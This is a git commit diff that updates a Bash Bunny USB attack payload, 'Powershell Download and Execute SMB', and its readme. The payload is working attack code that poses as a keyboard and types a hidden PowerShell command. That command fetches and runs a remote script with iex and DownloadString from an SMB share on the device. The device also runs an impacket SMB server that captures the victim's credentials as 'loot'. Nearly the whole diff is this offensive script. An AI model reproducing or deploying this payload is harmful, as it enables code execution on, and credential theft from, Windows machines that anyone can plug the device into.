Updated psh_DownloadExecSMB payload for fw v1.2 (#209)

* Powershell SMB Delivery * fixed smbserver.py call * Combined ATTACK MODES, improved SMB check * version fix
2025-10-29 16:58:25 +00:00 · 2017-05-02 20:41:44 -05:00 · 2017-05-02 20:41:44 -05:00 · 4d9bfeedd3
commit 4d9bfeedd3
parent 4165a2dda9
2 changed files with 16 additions and 26 deletions
--- a/payloads/library/execution/psh_DownloadExecSMB/payload.txt
+++ b/payloads/library/execution/psh_DownloadExecSMB/payload.txt
@ -2,11 +2,11 @@
 #
 # Title:         Powershell Download and Execute SMB
 # Author:        LowValueTarget
-# Version:       1.0
+# Version:       1.2
 # Category:      Powershell
 # Target:        Windows XP SP3+ (Powershell)
 # Attackmodes:   HID, RNDIS_ETHERNET
-# Firmware:      >= 1.1
+# Firmware:      >= 1.2
 #
 # Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.  
 # Ensure psh.txt exists in payload directory  
@ -15,17 +15,19 @@
 #
 # | Attack Stage        | Description                   |
 # | ------------------- | ------------------------------|
-# | Stage 1             | HID                           |
+# | Stage 1             | Powershell                    |
-# | Stage 2             | RNDIS_ETHERNET                |
+# | Stage 2             | Delivering powershell payload |
 # | Stage 3             | Delivering powershell payload |
 #
 ATTACKMODE RNDIS_ETHERNET HID
 # SETUP
 LED SETUP
 REQUIRETOOL impacket # required for SMB server
 GET SWITCH_POSITION
 GET TARGET_HOSTNAME
 GET HOST_IP
 PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
 # Check for psh.txt
@ -48,30 +50,19 @@ mkdir -p ${LOOTDIR}/${HOST}-$COUNT
 # Log file
 LOGFILE=psh_smb.log
 # Prevent premature access to SMB server
 echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all
 # Start SMB Server
 mkdir -p /loot
 python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp/ > /loot/${LOGFILE} &
-# STAGE 1 - HID
+# STAGE 1 - Powershell
 LED STAGE1
 ATTACKMODE HID
-RUN WIN "powershell -WindowStyle Hidden \"while (\$TRUE) {If (Test-Connection 172.16.64.1 -count 1 -quiet) {iex (New-Object Net.WebClient).DownloadString('\\\172.16.64.1\s\psh.txt');New-Item \\\172.16.64.1\s\COMPLETE -ItemType file;exit}}\""
+RUN WIN "powershell -WindowStyle Hidden \"while (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { iex (New-Object Net.WebClient).DownloadString('\\\\$HOST_IP\\s\\psh.txt');New-Item \\\172.16.64.1\\s\\COMPLETE -ItemType file;exit}}\""
 # Remove tracks in the psh payload if you wish
-# STAGE 2 - ETHERNET/SMB
+# STAGE 2 - Wait until payload retrieved
 LED STAGE2
 ATTACKMODE RNDIS_ETHERNET
 # Re-enable ICMP ping to trigger the powershell stager
 echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all
 # STAGE 3 - Wait until payload retrieved
 # Wait until payload is retrieved
-LED STAGE3
+LED STAGE2
 while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done
 # CLEANUP
@ -81,6 +72,6 @@ LED CLEANUP
 mv /loot/${LOGFILE} ${LOOTDIR}/${HOST}-$COUNT
 rm /loot/${LOGFILE}
 # Sync file system
-sync; sleep 1; sync
+sync
 LED FINISH
--- a/payloads/library/execution/psh_DownloadExecSMB/readme.md
+++ b/payloads/library/execution/psh_DownloadExecSMB/readme.md
@ -2,11 +2,11 @@
 ## Powershell Download and Execute SMB
 * Author: LowValueTarget  
-* Version: Version 1.0  
+* Version: Version 1.2  
 * Target: Windows XP SP3+ (Powershell)  
 * Category: Powershell  
 * Attackmodes: HID, RNDIS_Ethernet  
-* Firmware: >= 1.1  
+* Firmware: >= 1.2  
 ## Description
@ -21,6 +21,5 @@ Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer
 | Attack Stage        | Description                   |
 | ------------------- | ------------------------------|
-| Stage 1             | HID                           |
+| Stage 1             | Powershell                    |
-| Stage 2             | RNDIS_ETHERNET                |
+| Stage 2             | Delivering powershell payload |
 | Stage 3             | Delivering powershell payload |